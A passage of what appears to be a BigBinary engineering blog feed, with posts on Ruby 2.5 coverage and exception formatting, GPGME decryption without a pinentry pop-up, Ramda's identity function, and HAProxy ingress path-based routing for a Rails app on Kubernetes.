}}</code></pre><p>We can see that the coverage result is now a hash which reads that the<code>score.rb</code> file has <code>lines</code> coverage as <code>[1, nil, 1, 0, nil, 1, nil]</code>.</p><h3>Branch Coverage</h3><p>Branch coverage helps us identify which branches are executed and which ones arenot executed.</p><p>Let's see how to get branch coverage.</p><p>We will update the <code>score_coverage.rb</code> by enabling <code>branches</code> option.</p><pre><code class="language-ruby">require &quot;coverage&quot;Coverage.start(branches: true)load &quot;score.rb&quot;p Coverage.result</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby score_coverage.rb:FAILED{ &quot;score.rb&quot; =&gt;  { :branches =&gt; {      [:if, 0, 3, 0, 7, 3] =&gt; {        [:then, 1, 4, 2, 4, 15] =&gt; 0,        [:else, 2, 6, 2, 6, 15] =&gt; 1      }    }  }}</code></pre><p>Here is how to read the data in array.</p><pre><code class="language-ruby">[  BRANCH_TYPE,  UNIQUE_ID,  START_LINE_NUMBER,  START_COLUMN_NUMBER,  END_LINE_NUMBER,  END_COLUMN_NUMBER]</code></pre><p>Please note that column numbers start from 0 and line numbers start from 1.</p><p>Let's try to read above printed branch coverage result.</p><p><code>[:if, 0, 3, 0, 7, 3]</code> reads that <code>if</code> statement starts at line 3 &amp; column 0 andends at line 7 &amp; column 3.</p><p><code>[:then, 1, 4, 2, 4, 15]</code> reads that <code>then</code> clause starts at line 4 &amp; column 2and ends at line 4 &amp; column 15.</p><p>Similarly, <code>[:else, 2, 6, 2, 6, 15]</code> reads that <code>else</code> clause starts at line 6 &amp;column 2 and ends at line 6 &amp; column 15.</p><p>Most importantly as per the branch coverage format, we can see that the branchfrom <code>if</code> to <code>then</code> was never executed since <code>COUNTER</code> is <code>0</code>. The anotherbranch from <code>if</code> to <code>else</code> was executed once since <code>COUNTER</code> is <code>1</code>.</p><h3>Method Coverage</h3><p>Measuring method coverage helps us identify which methods were invoked and whichwere not.</p><p>We have a file <code>grade_calculator.rb</code>.</p><pre><code class="language-ruby">students_scores = { &quot;Sam&quot; =&gt; [53, 91, 72],                    &quot;Anna&quot; =&gt; [91, 97, 95],                    &quot;Bob&quot; =&gt; [33, 69, 63] }def average(scores)  scores.reduce(&amp;:+)/scores.sizeenddef grade(average_score)  case average_score  when 90.0..100.0 then :A  when 80.0..90.0 then :B  when 70.0..80.0 then :C  when 60.0..70.0 then :D  else :F  endenddef greet  puts &quot;Congratulations!&quot;enddef warn  puts &quot;Try hard next time!&quot;endstudents_scores.each do |student_name, scores|  achieved_grade = grade(average(scores))  puts &quot;#{student_name}, you've got '#{achieved_grade}' grade.&quot;  if achieved_grade == :A    greet  elsif achieved_grade == :F    warn  end  putsend</code></pre><p>To measure method coverage of above file, let's create<code>grade_calculator_coverage.rb</code> by enabling <code>methods</code> option on <code>Coverage#start</code>method.</p><pre><code class="language-ruby">require &quot;coverage&quot;Coverage.start(methods: true)load &quot;grade_calculator.rb&quot;p Coverage.result</code></pre><p>Let's run it using Ruby 2.5.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby grade_calculator_coverage.rbSam, you've got 'C' grade.Anna, you've got 'A' grade.Congratulations!Bob, you've got 'F' grade.Try hard next time!{ &quot;grade_calculator.rb&quot; =&gt; {    :methods =&gt; {      [Object, :warn, 23, 0, 25, 3] =&gt; 1,      [Object, :greet, 19, 0, 21, 3] =&gt; 1,      [Object, :grade, 9, 0, 17, 3] =&gt; 3,      [Object, :average, 5, 0, 7, 3] =&gt; 3    }  }}</code></pre><p>The format of method coverage result is defined as shown below.</p><pre><code class="language-ruby">[ CLASS_NAME,  METHOD_NAME,  START_LINE_NUMBER,  START_COLUMN_NUMBER,  END_LINE_NUMBER,  END_COLUMN_NUMBER ]</code></pre><p>Therefore, <code>[Object, :grade, 9, 0, 17, 3] =&gt; 3</code> reads that the <code>Object#grade</code>method which starts from line 9 &amp; column 0 to line 17 &amp; column 3 was invoked 3times.</p><h2>Conclusion</h2><p>We can measure all coverages at once also.</p><pre><code class="language-ruby">Coverage.start(lines: true, branches: true, methods: true)</code></pre><p>What's the use of these different types of coverages anyway?</p><p>Well, one use case is to integrate this in a test suite and to determine whichlines, branches and methods are executed and which ones are not executed by thetest. Further, we can sum up these and evaluate total coverage of a test suite.</p><p>Author of this feature, Yusuke Endoh has released<a href="https://github.com/mame/coverage-helpers">coverage-helpers</a> gem which allowsfurther advanced manipulation and processing of coverage results obtained using<code>Coverage#result</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Gpg decryption without pin entry pop up using GPGME]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/gpg-decryption-without-pin-entry-pop-up-using-gpgme"/>
      <updated>2018-03-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/gpg-decryption-without-pin-entry-pop-up-using-gpgme</id>
      <content type="html"><![CDATA[<p>In one of our projects, we implemented GPG decryption.</p><p>What is GPG ?</p><blockquote><p>GPG is a complete and free implementation of the OpenPGP standardas defined by<a href="https://www.ietf.org/rfc/rfc4880.txt">RFC4880</a> (also known as PGP).</p></blockquote><p>We used<a href="https://github.com/ueno/ruby-gpgme">GPGME</a>gem for this purpose.It provides three levels of API.In our case, we used<a href="https://github.com/ueno/ruby-gpgme#crypto">Crypto</a>which has the high level convenience methods to encrypt, decrypt, sign and verify signatures.</p><p>We needed to import private key for decrypting a filethat was encrypted using paired public key.First let's import the required private key.</p><pre><code class="language-ruby">GPGME::Key.import File.open('certs/pgp.key')</code></pre><p>Let's decrypt the file.</p><pre><code class="language-ruby">crypto = GPGME::Crypto.newoptions = { output: File.open('file.csv', 'wb') }crypto.decrypt File.open('file.csv.gpg'), options</code></pre><p>Above code has one problem.It will open a pop up for password inputthat has been used when public and private keyshave been generated.</p><p>To support password input without pop up,we updated the code as below.</p><pre><code class="language-ruby">crypto = GPGME::Crypto.newoptions = {            output: File.open('file.csv', 'wb'),            pinentry_mode: GPGME::PINENTRY_MODE_LOOPBACK,            password: 'welcome'          }crypto.decrypt File.open('file.csv.gpg'), options</code></pre><p>Here, <code>pinentry_mode</code> option allows password input without pop up.</p><p>We did not use latest version of GPGsince it does not support <code>pinentry_mode</code> option.Instead, We used <code>2.1.20</code> versionwhich has support for this option.<a href="https://gist.github.com/mattrude/3883a3801613b048d45b">Here</a>is the build instruction for that.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Practical usage of identity function]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/practical-usage-of-identity-function"/>
      <updated>2018-03-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/practical-usage-of-identity-function</id>
      <content type="html"><![CDATA[<p>If you are learning functional programming then you can't go far<a href="https://gist.github.com/Avaq/1f0636ec5c8d6aed2e45">without running into</a>&quot;identity function&quot;.</p><p>An identity function is a very basic function that</p><ul><li>takes one argument</li><li>returns the argument</li></ul><pre><code class="language-javascript">f(x) = x;</code></pre><p>This seems like the most useless function in the world. We never needed anyfunction like this while building any application. Then what's the big dealabout this identity function.</p><p>In this blog we will see how this identity concept is used in the real world.</p><p>For the implementation we will be using <a href="http://ramdajs.com/">Ramda.js</a>. Wepreviously<a href="https://blog.bigbinary.com/2017/10/06/optimize-javascript-code-for-composability-with-ramdajs.html">wrote about</a>how we, at BigBinary, write JavaScript code using Ramda.js.</p><p>Again please note that in the following code <code>R</code> stands for <code>Ramda</code> and not for<a href="https://www.r-project.org">programming language R</a>.</p><h3>Example 1</h3><p>Here is JavaScript code.</p><pre><code class="language-javascript">if (x) return x;return [];</code></pre><p>Here is same code using Ramda.js.</p><pre><code class="language-javascript">R.ifElse(R.isNil, () =&gt; [], R.identity);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?const%20fn%20%3D%20R.ifElse%28%0A%20%20R.isNil%2C%0A%20%20%28%29%20%3D%3E%20%5B%5D%2C%0A%20%20R.identity%0A%20%29%3B%0A%0Afn%28null%29%3B%0Afn%28%22hello%22%29%3B">try it</a></p><h3>Example 2</h3><p>Here we will use identity as the return value in the default case.</p><pre><code class="language-javascript">R.cond([  [R.equals(0), R.always(&quot;0&quot;)],  [R.equals(10), R.always(&quot;10&quot;)],  [R.T, R.identity],]);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?const%20fn%20%3D%20R.cond%28%5B%0A%20%20%5BR.equals%280%29%2C%20R.always%28%220%22%29%5D%2C%0A%20%20%5BR.equals%2810%29%2C%20R.always%28%2210%22%29%5D%2C%0A%20%20%5BR.T%2C%20R.identity%5D%0A%5D%29%3B%0A%0A%0Afn%280%29%3B%0Afn%2810%29%3B%0Afn%285%29%3B">try it</a></p><h3>Example 3</h3><p>Get the unique items from the list.</p><pre><code class="language-javascript">R.uniqBy(R.identity, [1, 1, 2]);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?R.uniqBy%28R.identity%2C%20%5B1%2C1%2C2%5D%29">try it</a></p><h3>Example 4</h3><p>Count occurrences of items in the list.</p><pre><code class="language-javascript">R.countBy(R.identity, [&quot;a&quot;, &quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;c&quot;, &quot;c&quot;]);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?R.countBy%28R.identity%2C%20%5B%22a%22%2C%22a%22%2C%22b%22%2C%22c%22%2C%22c%22%2C%22c%22%5D%29%3B">try it</a></p><h3>Example 5</h3><p>Begin value from zero all the way to n-1.</p><pre><code class="language-javascript">R.times(R.identity, 5);</code></pre><p><a href="http://ramdajs.com/repl/?v=0.25.0#?R.times%28R.identity%2C%205%29">try it</a></p><h3>Example 6</h3><p>Filter truthy values.</p><pre><code class="language-javascript">R.filter(R.identity, [  { a: 1 },  false,  { b: 2 },  true,  &quot;&quot;,  undefined,  null,  0,  {},  1,]);</code></pre><p><a href="http://ramdajs.com/repl/#?R.filter%28R.identity%2C%20%5B%7Ba%3A1%7D%2C%20false%2C%20%7Bb%3A2%7D%2C%20true%2C%20%27%27%2C%20undefined%2C%20null%2C%200%2C%20%7B%7D%2C%201%5D%29%3B">try it</a></p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 adds Exception#full_message method]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-adds-exception-full_message-method"/>
      <updated>2018-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-adds-exception-full_message-method</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.5, if we want to log a caught exception, we would need to formatit ourselves.</p><pre><code class="language-ruby">class AverageService  attr_reader :numbers, :coerced_numbers  def initialize(numbers)    @numbers = numbers    @coerced_numbers = coerce_numbers  end  def average    sum / count  end  private  def coerce_numbers    numbers.map do |number|      begin        Float(number)      rescue Exception =&gt; exception        puts &quot;#{exception.message} (#{exception.class})\n\t#{exception.backtrace.join(&quot;\n\t&quot;)}&quot;        puts &quot;Coercing '#{number}' as 0.0\n\n&quot;        0.0      end    end  end  def sum    coerced_numbers.map(&amp;:to_f).sum  end  def count    coerced_numbers.size.to_f  endendaverage = AverageService.new(ARGV).averageputs &quot;Average is: #{average}&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby average_service.rb 5 4f 7 1s0invalid value for Float(): &quot;4f&quot; (ArgumentError)average_service.rb:18:in `Float'average_service.rb:18:in `block in coerce_numbers'average_service.rb:16:in `map'average_service.rb:16:in `coerce_numbers'average_service.rb:6:in `initialize'average_service.rb:37:in `new'average_service.rb:37:in `&lt;main&gt;'Coercing '4f' as 0.0invalid value for Float(): &quot;1s0&quot; (ArgumentError)average_service.rb:18:in `Float'average_service.rb:18:in `block in coerce_numbers'average_service.rb:16:in `map'average_service.rb:16:in `coerce_numbers'average_service.rb:6:in `initialize'average_service.rb:37:in `new'average_service.rb:37:in `&lt;main&gt;'Coercing '1s0' as 0.0Average of [5.0, 0.0, 7.0, 0.0] is: 3.0</code></pre><p>It was <a href="https://bugs.ruby-lang.org/issues/14141">proposed</a> that there should bea simple method to print the caught exception using the same format that rubyuses while printing an uncaught exception.</p><p>Some of the proposed method names were <code>display</code>, <code>formatted</code>, <code>to_formatted_s</code>,<code>long_message</code>, and <code>full_message</code>.</p><p>Matz <a href="https://bugs.ruby-lang.org/issues/14141#note-15">approved</a> the<code>Exception#full_message</code> method name.</p><p>In Ruby 2.5, we can re-write above example as follows.</p><pre><code class="language-ruby">class AverageService  attr_reader :numbers, :coerced_numbers  def initialize(numbers)    @numbers = numbers    @coerced_numbers = coerce_numbers  end  def average    sum / count  end  private  def coerce_numbers    numbers.map do |number|      begin        Float(number)      rescue Exception =&gt; exception        puts exception.full_message        puts &quot;Coercing '#{number}' as 0.0\n\n&quot;        0.0      end    end  end  def sum    coerced_numbers.map(&amp;:to_f).sum  end  def count    coerced_numbers.size.to_f  endendaverage = AverageService.new(ARGV).averageputs &quot;Average is: #{average}&quot;</code></pre><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby average_service.rb 5 4f 7 1s0Traceback (most recent call last):6: from average_service.rb:37:in `&lt;main&gt;'5: from average_service.rb:37:in `new'4: from average_service.rb:6:in `initialize'3: from average_service.rb:16:in `coerce_numbers'2: from average_service.rb:16:in `map'1: from average_service.rb:18:in `block in coerce_numbers'average_service.rb:18:in `Float': invalid value for Float(): &quot;4f&quot; (ArgumentError)Coercing '4f' as 0.0Traceback (most recent call last):6: from average_service.rb:37:in `&lt;main&gt;'5: from average_service.rb:37:in `new'4: from average_service.rb:6:in `initialize'3: from average_service.rb:16:in `coerce_numbers'2: from average_service.rb:16:in `map'1: from average_service.rb:18:in `block in coerce_numbers'average_service.rb:18:in `Float': invalid value for Float(): &quot;1s0&quot; (ArgumentError)Coercing '1s0' as 0.0Average of [5.0, 0.0, 7.0, 0.0] is: 3.0</code></pre><p>Note that, Ruby 2.5 prints exception backtrace in reverse order if STDERR isunchanged and is a TTY as discussed<a href="https://blog.bigbinary.com/2018/03/07/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order.html">in our previous blog post</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 prints backtrace & error message in reverse]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order"/>
      <updated>2018-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order</id>
      <content type="html"><![CDATA[<p>Stack trace or backtrace is a sequential representation of the stack of methodcalls in a program which gets printed when an exception is raised. It is oftenused to find out the exact location in a program from where the exception wasraised.</p><h2>Before Ruby 2.5</h2><p>Before Ruby 2.5, the printed backtrace contained the exception class and theerror message at the top. Next line contained where in the program the exceptionwas raised. Next we got more lines which contained cascaded method calls.</p><p>Consider a simple Ruby program.</p><pre><code class="language-ruby">class DivisionService  attr_reader :a, :b  def initialize(a, b)    @a, @b = a.to_i, b.to_i  end  def divide    puts a / b  endendDivisionService.new(ARGV[0], ARGV[1]).divide</code></pre><p>Let's execute it using Ruby 2.4.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.4.0 ruby division_service.rb 5 0division_service.rb:9:in `/': divided by 0 (ZeroDivisionError)from division_service.rb:9:in `divide'from division_service.rb:13:in `&lt;main&gt;'</code></pre><p>In the printed backtrace above, the first line shows the location, error messageand the exception class name; whereas the subsequent lines shows the callermethod names and their locations. Each line in the backtrace above is oftenconsidered as a stack frame placed on the call stack.</p><p>Most of the times, a backtrace has so many lines that it makes it very difficultto fit the whole backtrace in the visible viewport of the terminal.</p><p>Since the backtrace is printed in top to bottom order the meaningful informationlike error message, exception class and the exact location where the exceptionwas raised is displayed at top of the backtrace. It means developers often needto scroll to the top in the terminal window to find out what went wrong.</p><h2>After Ruby 2.5</h2><p>Over 4 years ago an <a href="https://bugs.ruby-lang.org/issues/8661">issue</a> was createdto make printing of backtrace in reverse order configurable.</p><p>After much discussion Nobuyoshi Nakada made the commit to print backtrace anderror message<a href="https://github.com/ruby/ruby/commit/5318154fe1ac6f8dff014988488b9e063988a105">in reverse order</a>only when the error output device (<code>STDERR</code>) is a TTY (i.e. a terminal). Messagewill not be printed in reverse order if the original <code>STDERR</code> is attached tosomething like a <code>File</code> object.</p><p><a href="https://github.com/ruby/ruby/blob/5318154fe1ac6f8dff014988488b9e063988a105/eval_error.c#L187-L195">Look at the code here</a>where the check happens if <code>STDERR</code> is a TTY and is unchanged.</p><p>Let's execute the same program using Ruby 2.5.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby division_service.rb 5 0Traceback (most recent call last):2: from division_service.rb:13:in `&lt;main&gt;'1: from division_service.rb:9:in `divide'division_service.rb:9:in `/': divided by 0 (ZeroDivisionError)$</code></pre><p>We can notice two new changes in the above backtrace.</p><ol><li>The error message and exception class is printed last (i.e. at the bottom).</li><li>The stack also<a href="https://github.com/ruby/ruby/commit/87023a1dcc548f0eb7ccfacd64d795093d1c7e17">adds frame number</a>when printing in reverse order.</li></ol><p>This feature makes the debugging convenient when the backtrace size is a quitebig and cannot fit in the terminal window. We can easily see the error messagewithout scrolling up now.</p><p>Note that, the <code>Exception#backtrace</code> attribute still holds an array of stackframes like before in the top to bottom order.</p><p>So if we rescue the caught exception and print the backtrace manually</p><pre><code class="language-ruby">class DivisionService  attr_reader :a, :b  def initialize(a, b)    @a, @b = a.to_i, b.to_i  end  def divide    puts a / b  endendbegin  DivisionService.new(ARGV[0], ARGV[1]).dividerescue Exception =&gt; e  puts &quot;#{e.class}: #{e.message}&quot;  puts e.backtrace.join(&quot;\n&quot;)end</code></pre><p>we will get the old behavior.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby division_service.rb 5 0ZeroDivisionError: divided by 0division_service.rb:9:in `/'division_service.rb:9:in `divide'division_service.rb:16:in `&lt;main&gt;'$</code></pre><p>Also, note that if we assign <code>STDERR</code> with a <code>File</code> object, thus making it anon-TTY</p><pre><code class="language-ruby">puts &quot;STDERR is a TTY? [before]: #{$stderr.tty?}&quot;$stderr = File.new(&quot;stderr.log&quot;, &quot;w&quot;)$stderr.sync = trueputs &quot;STDERR is a TTY? [after]: #{$stderr.tty?}&quot;class DivisionService  attr_reader :a, :b  def initialize(a, b)    @a, @b = a.to_i, b.to_i  end  def divide    puts a / b  endendDivisionService.new(ARGV[0], ARGV[1]).divide</code></pre><p>we can get the old behavior but the backtrace would be written to the specifiedfile and not to <code>STDERR</code>.</p><pre><code class="language-ruby">$ RBENV_VERSION=2.5.0 ruby division_service.rb 5 0STDERR is a TTY? [before]: trueSTDERR is a TTY? [after]: false$ cat stderr.logdivision_service.rb:14:in `/': divided by 0 (ZeroDivisionError)from division_service.rb:14:in `divide'from division_service.rb:18:in `&lt;main&gt;'$</code></pre><p>This feature has been tagged as<a href="https://github.com/ruby/ruby/commit/5b58d8e6d8d187f37750540535f741cf6c2b661a">experimental feature</a>.What it means is that Ruby team is<a href="https://bugs.ruby-lang.org/issues/8661#journal-64903-notes">gathering feedback</a>on this feature.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Setup path based routing for a Rails app with HAProxy Ingress]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-haproxy-ingress-with-rails-uniconrn-and-websockets"/>
      <updated>2018-02-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-haproxy-ingress-with-rails-uniconrn-and-websockets</id>
      <content type="html"><![CDATA[<p>After months of testing we recently moved a Ruby on Rails application toproduction that is using Kubernetes cluster.</p><p>In this article we will discuss how to setup path based routing for a Ruby onRails application in kubernetes using HAProxy ingress.</p><p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>and <a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">ingress</a>.</p><p>Typically our Rails app has services like unicorn/puma,sidekiq/delayed-job/resque, Websockets and some dedicated API services. We hadone web service exposed to the world using load balancer and it was workingwell. But as the traffic increased it became necessary to route traffic based onURLs/path.</p><p>However Kubernetes does not supports this type of load balancing out of the box.There is work in progress for<a href="https://github.com/coreos/alb-ingress-controller">alb-ingress-controller</a> tosupport this but we could not rely on it for production usage as it is still inalpha.</p><p>The best way to achieve path based routing was to use<a href="https://kubernetes.io/docs/concepts/services-networking/ingress/#ingress-controllers">ingress controller</a>.</p><p>We researched and found that there are different types of ingress available ink8s world.</p><ol><li><a href="https://github.com/kubernetes/ingress-nginx">nginx-ingress</a></li><li><a href="https://github.com/kubernetes/ingress-gce">ingress-gce</a></li><li><a href="https://github.com/jcmoraisjr/haproxy-ingress">HAProxy-ingress</a></li><li><a href="https://docs.traefik.io/providers/kubernetes-ingress/">traefik</a></li><li><a href="https://github.com/appscode/voyager">voyager</a></li></ol><p>We experimented with nginx-ingress and HAProxy and decided to go with HAProxy.HAProxy has better support for Rails websockets which we needed in the project.</p><p>We will walk you through step by step on how to use haproxy ingress in a Railsapp.</p><h3>Configuring Rails app with HAProxy ingress controller</h3><p>Here is what we are going to do.</p><ul><li>Create a Rails app with different services and deployments.</li><li>Create tls secret for SSL.</li><li>Create HAProxy ingress configmap.</li><li>Create HAProxy ingress controller.</li><li>Expose ingress with service type LoadBalancer</li><li>Setup app DNS with ingress service.</li><li>Create different ingress rules specifying path based routing.</li><li>Test the path based routing.</li></ul><p>Now let's build Rails application deployment manifest for services likeweb(unicorn),background(sidekiq), Websocket(ruby thin),API(dedicated unicorn).</p><p>Here is our web app deployment and service template.</p><pre><code class="language-yaml">---apiVersion: v1kind: Deploymentmetadata:  name: test-production-web  labels:    app: test-production-web  namespace: testspec:  template:    metadata:      labels:        app: test-production-web    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-production        imagePullPolicy: Always       env:        - name: POSTGRES_HOST          value: test-production-postgres        - name: REDIS_HOST          value: test-production-redis        - name: APP_ENV          value: production        - name: APP_TYPE          value: web        - name: CLIENT          value: test        ports:        - containerPort: 80      imagePullSecrets:        - name: registrykey---apiVersion: v1kind: Servicemetadata:  name: test-production-web  labels:    app: test-production-web  namespace: testspec:  ports:  - port: 80    protocol: TCP    targetPort: 80  selector:    app: test-production-web</code></pre><p>Here is background app deployment and service template.</p><pre><code class="language-yaml">---apiVersion: v1kind: Deploymentmetadata:  name: test-production-background  labels:    app: test-production-background  namespace: testspec:  template:    metadata:      labels:        app: test-production-background    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-production        imagePullPolicy: Always       env:        - name: POSTGRES_HOST          value: test-production-postgres        - name: REDIS_HOST          value: test-production-redis        - name: APP_ENV          value: production        - name: APP_TYPE          value: background        - name: CLIENT          value: test        ports:        - containerPort: 80      imagePullSecrets:        - name: registrykey---apiVersion: v1kind: Servicemetadata:  name: test-production-background  labels:    app: test-production-background  namespace: testspec:  ports:  - port: 80    protocol: TCP    targetPort: 80  selector:    app: test-production-background</code></pre><p>Here is websocket app deployment and service template.</p><pre><code class="language-yaml">---apiVersion: v1kind: Deploymentmetadata:  name: test-production-websocket  labels:    app: test-production-websocket  namespace: testspec:  template:    metadata:      labels:        app: test-production-websocket    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-production        imagePullPolicy: Always       env:        - name: POSTGRES_HOST          value: test-production-postgres        - name: REDIS_HOST          value: test-production-redis        - name: APP_ENV          value: production        - name: APP_TYPE          value: websocket        - name: CLIENT          value: test        ports:        - containerPort: 80      imagePullSecrets:        - name: registrykey---apiVersion: v1kind: Servicemetadata:  name: test-production-websocket  labels:    app: test-production-websocket  namespace: testspec:  ports:  - port: 80    protocol: TCP    targetPort: 80  selector:    app: test-production-websocket</code></pre><p>Here is API app deployment and service info.</p><pre><code class="language-yaml">---apiVersion: v1kind: Deploymentmetadata:  name: test-production-api  labels:    app: test-production-api  namespace: testspec:  template:    metadata:      labels:        app: test-production-api    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-production        imagePullPolicy: Always       env:        - name: POSTGRES_HOST          value: test-production-postgres        - name: REDIS_HOST          value: test-production-redis        - name: APP_ENV          value: production        - name: APP_TYPE          value: api        - name: CLIENT          value: test        ports:        - containerPort: 80      imagePullSecrets:        - name: registrykey---apiVersion: v1kind: Servicemetadata:  name: test-production-api  labels:    app: test-production-api  namespace: testspec:  ports:  - port: 80    protocol: TCP    targetPort: 80  selector:    app: test-production-api</code></pre><p>Let's launch this manifest using <code>kubectl apply</code>.</p><pre><code class="language-bash">$ kubectl apply -f test-web.yml -f test-background.yml -f test-websocket.yml -f test-api.ymldeployment &quot;test-production-web&quot; createdservice &quot;test-production-web&quot; createddeployment &quot;test-production-background&quot; createdservice &quot;test-production-background&quot; createddeployment &quot;test-production-websocket&quot; createdservice &quot;test-production-websocket&quot; createddeployment &quot;test-production-api&quot; createdservice &quot;test-production-api&quot; created</code></pre><p>Once our app is deployed and running we should create HAProxy ingress. Beforethat let's create a tls secret with our SSL key and certificate.</p><p>This is also used to enable HTTPS for app URL and to terminate it on L7.</p><pre><code class="language-bash">$ kubectl create secret tls tls-certificate --key server.key --cert server.pem</code></pre><p>Here <code>server.key</code> is our SSL key and <code>server.pem</code> is our SSL certificate in pemformat.</p><p>Now let's Create HAProxy controller resources.</p><h3>HAProxy configmap</h3><p>For all the available configuration parameters from HAProxy refer<a href="https://github.com/jcmoraisjr/HAProxy-ingress#configmap">here</a>.</p><pre><code class="language-yaml">apiVersion: v1data:  dynamic-scaling: &quot;true&quot;  backend-server-slots-increment: &quot;4&quot;kind: ConfigMapmetadata:  name: haproxy-configmap  namespace: test</code></pre><h3>HAProxy Ingress controller deployment</h3><p>Deployment template for the Ingress controller with at-least 2 replicas tomanage rolling deploys.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    run: haproxy-ingress  name: haproxy-ingress  namespace: testspec:  replicas: 2  selector:    matchLabels:      run: haproxy-ingress  template:    metadata:      labels:        run: haproxy-ingress    spec:      containers:        - name: haproxy-ingress          image: quay.io/jcmoraisjr/haproxy-ingress:v0.5-beta.1          args:            - --default-backend-service=$(POD_NAMESPACE)/test-production-web            - --default-ssl-certificate=$(POD_NAMESPACE)/tls-certificate            - --configmap=$(POD_NAMESPACE)/haproxy-configmap            - --ingress-class=haproxy          ports:            - name: http              containerPort: 80            - name: https              containerPort: 443            - name: stat              containerPort: 1936          env:            - name: POD_NAME              valueFrom:                fieldRef:                  fieldPath: metadata.name            - name: POD_NAMESPACE              valueFrom:                fieldRef:                  fieldPath: metadata.namespace</code></pre><p>Notable fields in above manifest are arguments passed to controller.</p><p><code>--default-backend-service</code> is the service when No rule is matched your requestwill be served by this app.</p><p>In our case it is <code>test-production-web</code> service, But it can be custom 404 pageor whatever better you think.</p><p><code>--default-ssl-certificate</code> is the SSL secret we just created above this willterminate SSL on L7 and our app is served on HTTPS to outside world.</p><h3>HAProxy Ingress service</h3><p>This is the <code>LoadBalancer</code> type service to allow client traffic to reach ourIngress Controller.</p><p>LoadBalancer has access to both public network and internal Kubernetes networkwhile retaining the L7 routing of the Ingress Controller.</p><pre><code class="language-yaml">apiVersion: v1kind: Servicemetadata:  labels:    run: haproxy-ingress  name: haproxy-ingress  namespace: testspec:  type: LoadBalancer  ports:    - name: http      port: 80      protocol: TCP      targetPort: 80    - name: https      port: 443      protocol: TCP      targetPort: 443    - name: stat      port: 1936      protocol: TCP      targetPort: 1936  selector:    run: haproxy-ingress</code></pre><p>Now let's apply all the manifests of HAProxy.</p><pre><code class="language-bash">$ kubectl apply -f haproxy-configmap.yml -f haproxy-deployment.yml -f haproxy-service.ymlconfigmap &quot;haproxy-configmap&quot; createddeployment &quot;haproxy-ingress&quot; createdservice &quot;haproxy-ingress&quot; created</code></pre><p>Once all the resources are running get the LoadBalancer endpoint using.</p><pre><code class="language-bash">$ kubectl -n test get svc haproxy-ingress -o wideNAME               TYPE           CLUSTER-IP       EXTERNAL-IP                                                            PORT(S)                                     AGE       SELECTORhaproxy-ingress   LoadBalancer   100.67.194.186   a694abcdefghi11e8bc3b0af2eb5c5d8-806901662.us-east-1.elb.amazonaws.com   80:31788/TCP,443:32274/TCP,1936:32157/TCP   2m        run=ingress</code></pre><h3>DNS mapping with application URL</h3><p>Once we have ELB endpoint of ingress service, map the DNS with URL like<code>test-rails-app.com</code>.</p><h3>Ingress Implementation</h3><p>Now after doing all the hard work it is time to configure ingress and path basedrules.</p><p>In our case we want to have following rules.</p><p><em>https://test-rails-app.com</em> requests to be served by <code>test-production-web</code>.</p><p><em>https://test-rails-app.com/websocket</em> requests to be served by<code>test-production-websocket</code>.</p><p><em>https://test-rails-app.com/api</em> requests to be served by <code>test-production-api</code>.</p><p>Let's create a ingress manifest defining all the rules.</p><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Ingressmetadata:  name: ingress  namespace: testspec:  tls:    - hosts:        - test-rails-app.com      secretName: tls-certificate  rules:    - host: test-rails-app.com      http:        paths:          - path: /            backend:              serviceName: test-production-web              servicePort: 80          - path: /api            backend:              serviceName: test-production-api              servicePort: 80          - path: /websocket            backend:              serviceName: test-production-websocket              servicePort: 80</code></pre><p>Moreover there are<a href="https://github.com/jcmoraisjr/haproxy-ingress#annotations">Ingress Annotations</a>for adjusting configuration changes.</p><p>As expected, now our default traffic on <code>/</code> is routed to 